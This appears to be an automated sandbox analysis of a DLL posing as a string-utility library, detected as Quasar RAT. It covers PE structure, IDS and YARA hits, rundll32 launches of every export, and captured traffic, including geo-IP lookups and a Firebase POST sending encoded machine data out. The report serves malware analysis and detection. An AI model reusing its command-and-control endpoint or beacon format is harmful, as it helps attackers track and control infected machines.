                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x7200680x28.sdata
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x71fd100x53.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x7220000x33c.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x71ea000x2d68
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x7240000x30.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x10.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20100x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000x71dd720x71de004d64ab768b4471f4dad807114cfa4605unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .sdata0x7200000x1e30x200205f35db0c4d7d485e9c66117be0b622False0.587890625OpenPGP Public Key4.531194460208676IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x7220000x33c0x4009e217ba6f8b9f646b6164e424d8a3a34False0.341796875data2.6099876523576393IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x7240000x300x2004d5f1334246aa8d607d9db9127b03f3bFalse0.115234375data0.5919266160963527IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_VERSION0x7220580x2e4data0.4297297297297297

                                Imports

                                DLLImport
                                mscoree.dll_CorDllMain

                                Exports

                                NameOrdinalAddress
                                V_FixDoubleSlashes00x180002122
                                V_FixSlashes10x1800020d2
                                V_IsAbsolutePath20x180002112
                                V_RemoveDotSlashes30x180002102
                                V_StripLastDir40x1800020c2
                                V_StripTrailingSlash50x1800020b2
                                V_UTF16ToUTF860x1800020a2
                                V_UTF8ToUTF1670x180002092
                                V_snprintf80x180002062
                                V_strncat90x180002082
                                V_strncat_length100x1800020f2
                                V_strncpy110x1800020e2
                                V_vsnwprintf120x180002072

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                07/15/24-21:07:19.513418TCP2814031ETPRO TROJAN W32/Quasar RAT Connectivity Check4973880192.168.2.488.198.193.213
                                07/15/24-21:07:19.945864TCP2814030ETPRO TROJAN W32/Quasar RAT Connectivity Check 24973980192.168.2.43.33.130.190

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jul 15, 2024 21:07:19.239309072 CEST49735443192.168.2.435.201.97.85
                                Jul 15, 2024 21:07:19.239355087 CEST4434973535.201.97.85192.168.2.4
                                Jul 15, 2024 21:07:19.239518881 CEST49735443192.168.2.435.201.97.85
                                Jul 15, 2024 21:07:19.271861076 CEST49735443192.168.2.435.201.97.85
                                Jul 15, 2024 21:07:19.271893024 CEST4434973535.201.97.85192.168.2.4
                                Jul 15, 2024 21:07:19.507909060 CEST4973880192.168.2.488.198.193.213
                                Jul 15, 2024 21:07:19.512898922 CEST804973888.198.193.213192.168.2.4
                                Jul 15, 2024 21:07:19.513000965 CEST4973880192.168.2.488.198.193.213
                                Jul 15, 2024 21:07:19.513417959 CEST4973880192.168.2.488.198.193.213
                                Jul 15, 2024 21:07:19.518230915 CEST804973888.198.193.213192.168.2.4
                                Jul 15, 2024 21:07:19.786905050 CEST4434973535.201.97.85192.168.2.4
                                Jul 15, 2024 21:07:19.787228107 CEST49735443192.168.2.435.201.97.85
                                Jul 15, 2024 21:07:19.792002916 CEST49735443192.168.2.435.201.97.85
                                Jul 15, 2024 21:07:19.792021990 CEST4434973535.201.97.85192.168.2.4
                                Jul 15, 2024 21:07:19.792522907 CEST4434973535.201.97.85192.168.2.4
                                Jul 15, 2024 21:07:19.838023901 CEST49735443192.168.2.435.201.97.85
                                Jul 15, 2024 21:07:19.854521990 CEST4973880192.168.2.488.198.193.213
                                Jul 15, 2024 21:07:19.884505033 CEST4434973535.201.97.85192.168.2.4
                                Jul 15, 2024 21:07:19.900291920 CEST804973888.198.193.213192.168.2.4
                                Jul 15, 2024 21:07:19.940666914 CEST4973980192.168.2.43.33.130.190
                                Jul 15, 2024 21:07:19.945677996 CEST80497393.33.130.190192.168.2.4
                                Jul 15, 2024 21:07:19.945863962 CEST4973980192.168.2.43.33.130.190
                                Jul 15, 2024 21:07:19.945863962 CEST4973980192.168.2.43.33.130.190
                                Jul 15, 2024 21:07:19.950813055 CEST80497393.33.130.190192.168.2.4
                                Jul 15, 2024 21:07:19.991322994 CEST804973888.198.193.213192.168.2.4
                                Jul 15, 2024 21:07:19.992115974 CEST4973880192.168.2.488.198.193.213
                                Jul 15, 2024 21:07:20.020019054 CEST4434973535.201.97.85192.168.2.4
                                Jul 15, 2024 21:07:20.054713011 CEST49735443192.168.2.435.201.97.85
                                Jul 15, 2024 21:07:20.054778099 CEST4434973535.201.97.85192.168.2.4
                                Jul 15, 2024 21:07:20.188385010 CEST4434973535.201.97.85192.168.2.4
                                Jul 15, 2024 21:07:20.188676119 CEST4434973535.201.97.85192.168.2.4
                                Jul 15, 2024 21:07:20.188889980 CEST49735443192.168.2.435.201.97.85
                                Jul 15, 2024 21:07:20.194135904 CEST4973980192.168.2.43.33.130.190
                                Jul 15, 2024 21:07:20.196966887 CEST49735443192.168.2.435.201.97.85
                                Jul 15, 2024 21:07:20.233011961 CEST4974080192.168.2.4104.26.13.205
                                Jul 15, 2024 21:07:20.238089085 CEST8049740104.26.13.205192.168.2.4
                                Jul 15, 2024 21:07:20.238164902 CEST4974080192.168.2.4104.26.13.205
                                Jul 15, 2024 21:07:20.238285065 CEST4974080192.168.2.4104.26.13.205
                                Jul 15, 2024 21:07:20.240206957 CEST80497393.33.130.190192.168.2.4
                                Jul 15, 2024 21:07:20.243071079 CEST8049740104.26.13.205192.168.2.4
                                Jul 15, 2024 21:07:20.344536066 CEST80497393.33.130.190192.168.2.4
                                Jul 15, 2024 21:07:20.344614983 CEST4973980192.168.2.43.33.130.190
                                Jul 15, 2024 21:07:20.737621069 CEST8049740104.26.13.205192.168.2.4
                                Jul 15, 2024 21:07:20.783165932 CEST4974080192.168.2.4104.26.13.205
                                Jul 15, 2024 21:09:00.753093004 CEST4974080192.168.2.4104.26.13.205
                                Jul 15, 2024 21:09:01.056432962 CEST4974080192.168.2.4104.26.13.205
                                Jul 15, 2024 21:09:01.284600973 CEST8049740104.26.13.205192.168.2.4
                                Jul 15, 2024 21:09:01.284889936 CEST8049740104.26.13.205192.168.2.4
                                Jul 15, 2024 21:09:01.285069942 CEST4974080192.168.2.4104.26.13.205

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jul 15, 2024 21:07:19.098495007 CEST5533753192.168.2.41.1.1.1
                                Jul 15, 2024 21:07:19.186568022 CEST53553371.1.1.1192.168.2.4
                                Jul 15, 2024 21:07:19.494256020 CEST5313953192.168.2.41.1.1.1
                                Jul 15, 2024 21:07:19.507066011 CEST53531391.1.1.1192.168.2.4
                                Jul 15, 2024 21:07:19.923499107 CEST5101453192.168.2.41.1.1.1
                                Jul 15, 2024 21:07:19.940026045 CEST53510141.1.1.1192.168.2.4
                                Jul 15, 2024 21:07:20.218703985 CEST4971753192.168.2.41.1.1.1
                                Jul 15, 2024 21:07:20.225878954 CEST53497171.1.1.1192.168.2.4

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Jul 15, 2024 21:07:19.098495007 CEST192.168.2.41.1.1.10x7911Standard query (0)argentina-e4162-default-rtdb.firebaseio.comA (IP address)IN (0x0001)false
                                Jul 15, 2024 21:07:19.494256020 CEST192.168.2.41.1.1.10xfff6Standard query (0)telize.comA (IP address)IN (0x0001)false
                                Jul 15, 2024 21:07:19.923499107 CEST192.168.2.41.1.1.10xd83fStandard query (0)freegeoip.netA (IP address)IN (0x0001)false
                                Jul 15, 2024 21:07:20.218703985 CEST192.168.2.41.1.1.10x1adcStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Jul 15, 2024 21:07:19.186568022 CEST1.1.1.1192.168.2.40x7911No error (0)argentina-e4162-default-rtdb.firebaseio.com35.201.97.85A (IP address)IN (0x0001)false
                                Jul 15, 2024 21:07:19.186568022 CEST1.1.1.1192.168.2.40x7911No error (0)argentina-e4162-default-rtdb.firebaseio.com35.190.39.113A (IP address)IN (0x0001)false
                                Jul 15, 2024 21:07:19.186568022 CEST1.1.1.1192.168.2.40x7911No error (0)argentina-e4162-default-rtdb.firebaseio.com34.120.206.254A (IP address)IN (0x0001)false
                                Jul 15, 2024 21:07:19.186568022 CEST1.1.1.1192.168.2.40x7911No error (0)argentina-e4162-default-rtdb.firebaseio.com34.120.160.131A (IP address)IN (0x0001)false
                                Jul 15, 2024 21:07:19.507066011 CEST1.1.1.1192.168.2.40xfff6No error (0)telize.com88.198.193.213A (IP address)IN (0x0001)false
                                Jul 15, 2024 21:07:19.940026045 CEST1.1.1.1192.168.2.40xd83fNo error (0)freegeoip.net3.33.130.190A (IP address)IN (0x0001)false
                                Jul 15, 2024 21:07:19.940026045 CEST1.1.1.1192.168.2.40xd83fNo error (0)freegeoip.net15.197.148.33A (IP address)IN (0x0001)false
                                Jul 15, 2024 21:07:20.225878954 CEST1.1.1.1192.168.2.40x1adcNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                Jul 15, 2024 21:07:20.225878954 CEST1.1.1.1192.168.2.40x1adcNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                Jul 15, 2024 21:07:20.225878954 CEST1.1.1.1192.168.2.40x1adcNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • argentina-e4162-default-rtdb.firebaseio.com
                                • telize.com
                                • freegeoip.net
                                • api.ipify.org

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.44973888.198.193.213807100C:\Windows\System32\rundll32.exe
                                TimestampBytes transferredDirectionData
                                Jul 15, 2024 21:07:19.513417959 CEST144OUTGET /geoip HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
                                Host: telize.com
                                Connection: Keep-Alive


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.4497393.33.130.190807100C:\Windows\System32\rundll32.exe
                                TimestampBytes transferredDirectionData
                                Jul 15, 2024 21:07:19.945863962 CEST146OUTGET /xml/ HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
                                Host: freegeoip.net
                                Connection: Keep-Alive


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.449740104.26.13.205807100C:\Windows\System32\rundll32.exe
                                TimestampBytes transferredDirectionData
                                Jul 15, 2024 21:07:20.238285065 CEST142OUTGET / HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
                                Host: api.ipify.org
                                Connection: Keep-Alive
                                Jul 15, 2024 21:07:20.737621069 CEST227INHTTP/1.1 200 OK
                                Date: Mon, 15 Jul 2024 19:07:20 GMT
                                Content-Type: text/plain
                                Content-Length: 11
                                Connection: keep-alive
                                Vary: Origin
                                CF-Cache-Status: DYNAMIC
                                Server: cloudflare
                                CF-RAY: 8a3c08ee29850f53-EWR
                                Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                Data Ascii: 8.46.123.33


                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.44973535.201.97.854437100C:\Windows\System32\rundll32.exe
                                TimestampBytes transferredDirectionData
                                2024-07-15 19:07:19 UTC192OUTPOST /user.json HTTP/1.1
                                Content-Type: application/json; charset=utf-8
                                Host: argentina-e4162-default-rtdb.firebaseio.com
                                Content-Length: 76
                                Expect: 100-continue
                                Connection: Keep-Alive
                                2024-07-15 19:07:20 UTC25INHTTP/1.1 100 Continue
                                2024-07-15 19:07:20 UTC1OUTData Raw: 7b
                                Data Ascii: {
                                2024-07-15 19:07:20 UTC75OUTData Raw: 22 4d 41 51 55 49 4e 41 22 3a 22 4e 7a 45 31 4e 54 63 31 22 2c 22 44 41 54 41 22 3a 22 4d 54 55 75 4d 44 63 75 4d 6a 41 79 4e 43 41 78 4e 54 6f 77 4e 7a 6f 78 4f 41 3d 3d 22 2c 22 50 4c 55 47 49 4e 22 3a 22 4d 41 3d 3d 22 7d
                                Data Ascii: "MAQUINA":"NzE1NTc1","DATA":"MTUuMDcuMjAyNCAxNTowNzoxOA==","PLUGIN":"MA=="}
                                2024-07-15 19:07:20 UTC318INHTTP/1.1 200 OK
                                Server: nginx
                                Date: Mon, 15 Jul 2024 19:07:20 GMT
                                Content-Type: application/json; charset=utf-8
                                Content-Length: 31
                                Connection: close
                                Access-Control-Allow-Origin: *
                                Cache-Control: no-cache
                                Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                {"name":"-O1rmguwaszAMl0bAl2T"}


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:15:07:00
                                Start date:15/07/2024
                                Path:C:\Windows\System32\loaddll64.exe
                                Wow64 process (32bit):false
                                Commandline:loaddll64.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll"
                                Imagebase:0x7ff6182e0000
                                File size:165'888 bytes
                                MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:1
                                Start time:15:07:00
                                Start date:15/07/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:2
                                Start time:15:07:00
                                Start date:15/07/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1
                                Imagebase:0x7ff680840000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:3
                                Start time:15:07:00
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixDoubleSlashes
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000003.00000002.1682910878.000002A89AAA2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000003.00000002.1684076753.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:4
                                Start time:15:07:00
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.1684166716.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.1683326542.000002596EF32000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:5
                                Start time:15:07:03
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixSlashes
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000005.00000002.1711858916.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000005.00000002.1711125446.0000024C76552000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:6
                                Start time:15:07:06
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_IsAbsolutePath
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000002.1742655748.000001C4BEC02000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000002.1743520661.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:7
                                Start time:15:07:09
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixDoubleSlashes
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000007.00000002.1800566707.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000007.00000002.1789628850.000002755E652000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:8
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixSlashes
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000008.00000002.1798585277.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000008.00000002.1782774058.000001DD420A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:9
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_IsAbsolutePath
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000009.00000002.1803017561.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000009.00000002.1795742842.0000013F23772000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:10
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_vsnwprintf
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000002.1806601416.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000002.1799338023.000001EDF6DB2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:11
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncpy
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000B.00000002.1803940812.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000B.00000002.1796633648.000001D54AB72000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:12
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat_length
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000C.00000002.1803576304.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000C.00000002.1795862473.000002CAF50D2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:13
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000D.00000002.1801854722.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000D.00000002.1794101772.000001E0A1962000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Has exited:true

                                General

                                Target ID:14
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_snprintf
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000E.00000002.1805439876.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000E.00000002.1798302966.0000023D3F972000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Has exited:true

                                General

                                Target ID:15
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF8ToUTF16
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000F.00000002.1805465891.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000F.00000002.1798309140.000002D2EC852000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Has exited:true

                                General

                                Target ID:16
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF16ToUTF8
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000010.00000002.2929241294.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000010.00000002.2926634464.0000020471362000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Has exited:false

                                General

                                Target ID:17
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripTrailingSlash
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000011.00000002.1803619460.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000011.00000002.1795873767.0000019D796C2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Has exited:true

                                General

                                Target ID:18
                                Start time:15:07:10
                                Start date:15/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripLastDir
                                Imagebase:0x7ff7ff470000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000012.00000002.1800394851.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
